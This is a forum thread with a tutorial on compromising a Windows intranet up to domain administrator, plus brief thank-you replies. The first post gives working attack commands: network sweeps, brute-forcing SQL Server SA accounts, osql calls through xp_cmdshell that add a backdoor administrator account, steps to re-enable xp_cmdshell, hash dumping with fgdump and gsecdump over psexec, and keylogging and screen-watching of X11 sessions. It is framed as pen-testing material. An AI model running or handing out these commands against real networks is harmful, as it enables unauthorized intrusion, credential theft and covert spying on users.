Results 1 to 9 of 9

Thread: Tutorial : Intranet Exploitation

  1. #1
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Chico CA

    Default Tutorial : Intranet Exploitation

    This tutorial will demonstrate how to gain Domain Administrator on a typical Windows intranet through common security oversights. Most of these tools are Windows based, but may run in Wine. Please post if you can verify this, or if you know a Linux equivalent tool.


    Obviously start with the network you've been DHCP'd.

    NET VIEW command

    Displays a list of computers in a specified workgroup or the shared resources available on a specified computer.

    [\\computername [/CACHE] | /DOMAIN[:domainname]]

    NET VIEW /NETWORK:NW [\\computername]

    Domain Zone Transfers

    Starting with the DNS servers you DHCP'd with, try to zone transfers. If successful, extrapolate Class C (/24) networks from the individual IP addresses.

    dig axfr

    Nmap scanning

    Perform a ping sweep of the network range.

    nmap -sP -v xx.xx.xx.xx/24 > ping_results.txt
    Clean up the ping sweep.

    cat ping_results.txt | grep -i 'up' | cut --delimiter=" " -f 2 > ping_results_final.txt
    Generate IP list from the know net ranges

    gping xx.xx.0.255 >> iplist.txt gping xx.xx.0.255 >> iplist.txt
    gping may be found here:


    SQL Discovery and Exploitation

    A common entry point to a network is through unsecure SQL servers. SQLPing 3.0 performs both active and passive scans of your network in order to identify all of the SQL Server/MSDE installations in your enterprise. It also adds brute-force password capabilities and the ability to brute-force multiple instances.

    It can be found here:

    Once you have found a weak SA account, use the command-line OSQL tool found bundled with MSDE. This is the syntax to create an account and promote it to a local administrator:
    osql -S %servername% -U %username% -P %password% -t 15 -b -Q "xp_cmdshell 'net user pwnd pwndABC123 /add'"
    osql -S %servername% -U %username% -P %password% -t 15 -b -Q "xp_cmdshell 'net localgroup administrators pwnd /add'"

    With newer releases of SQL, you may find that the xp command shell has been disabled. Thoughtfully, Microsoft allows you to re-enable this feature!
    osql -S %servername% -U %username% -P %password% -t 15 -b -Q "EXEC sp_configure 'show advanced options', 1"
    osql -S %servername% -U %username% -P %password% -t 15 -b -Q "EXEC sp_configure 'xp_cmdshell', 1"

    As a local administrator, you can now dump the HASHES for the local workstation. Use FGDump, found here:

    fgdump -h %hostname% -u pwnd -p pwndABC123

    If FGDump doesn't work, try GSECDump, found here:

    GSECDump should be used with psexec, found here:

    psexec \\%hostname% -u pwnd -p pwndABC123 -s -f -c gsecdump.exe -s

    X11 exploitation

    If your nmap scans reveal port 6000-6005 being open, chances are you may be dealing with the X11 protocol (X Windows). X11 is plain-text and can be keylogged and remotely viewed. You will need the NSAT (Network Security Analysis Tool) which can be found here:

    You may find that the tool does not complete a make. Download my fixed version towards the bottom of the post.

    Filter your nmap results to only show ports 6000-6005 and copy the results into a text file. NSAT will scan the hosts in this text file. Syntax:

    nsat -C nsat_X.conf -n -f iplist.txt

    The results should show something similar to this:

    [port] - X Windows
    [port] - dumpable/sniffable

    Target the IP's that are "dumpable/sniffable" with XSpy, found here:



    You should now be keylogging this session. If you want to view the actual desktop of the user, use xwatchwin, found here:



    FTP exploitation

    Utilizing NSAT, filter your nmap results for port 21. Take this IP list and run it through NSAT.
    nsat -C nsat_FTP.conf -n -f iplist.txt

    The results should show something similar to this: - anonymous login - anonymous login

    Share Enumeration

    A common security flaw occurs when users define file shares with lax security, allowing unauthorized users to see sensitive files. ShareEnum looks for these open shares on the network. You can find it here:

    NetworkSleuth is a network file searching utility, that allows you to quickly locate files across a network. You can search for specific file names or for specific file types (e.g. files named/containing password). Get it here:

    I hope this helps some of you with your pen-testing endeavors. Please add to this tutorial with your own methodologies.


  2. #2
    Join Date
    Mar 2007


    Thanks for the tutorial williamc. Officially though I have to move it to general IT because it is not based on backtrack. Nothing personal I'm just following the rules.

  3. #3
    Member s1lang's Avatar
    Join Date
    Sep 2007


    Thank you for this mate

  4. #4
    Just burned his ISO
    Join Date
    May 2008


    Thanks for the tutorial

  5. #5
    Join Date
    Feb 2006

    Default thanks

    Ran across this, nice job thanks.

  6. #6
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Chico CA


    Updated. Now you can use xp command shell on newer SQL installations that have it disabled by default.

  7. #7
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007


    Quote Originally Posted by williamc View Post
    Updated. Now you can use xp command shell on newer SQL installations that have it disabled by default.
    Very nice work, brother. It's glad to see that knowledge isn't just being hoarded for personal gain, but is being shared for all the right reasons. Neophytes take heed: this is the kind of example you, and even those of us more versed in the security realm, should all follow....

    I look forward to any and everything else you have to offer.

    "The goal of every man should be to continue living even after he can no longer draw breath."


  8. #8
    Senior Member Talkie Toaster's Avatar
    Join Date
    Jun 2008

    Default Thannks man


    Thanks for sharing, well written tuts like this have me just itching to try out some new tools.

    Time to break my home network,again...


  9. #9
    Good friend of the forums
    Join Date
    Jan 2010
    outside chicago, il


    Nice work williamc. SQLPing looks interesting.

    I added a section on gsecdump to the password cracking guide.
    I like the bleeding edge, but I don't like blood loss

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts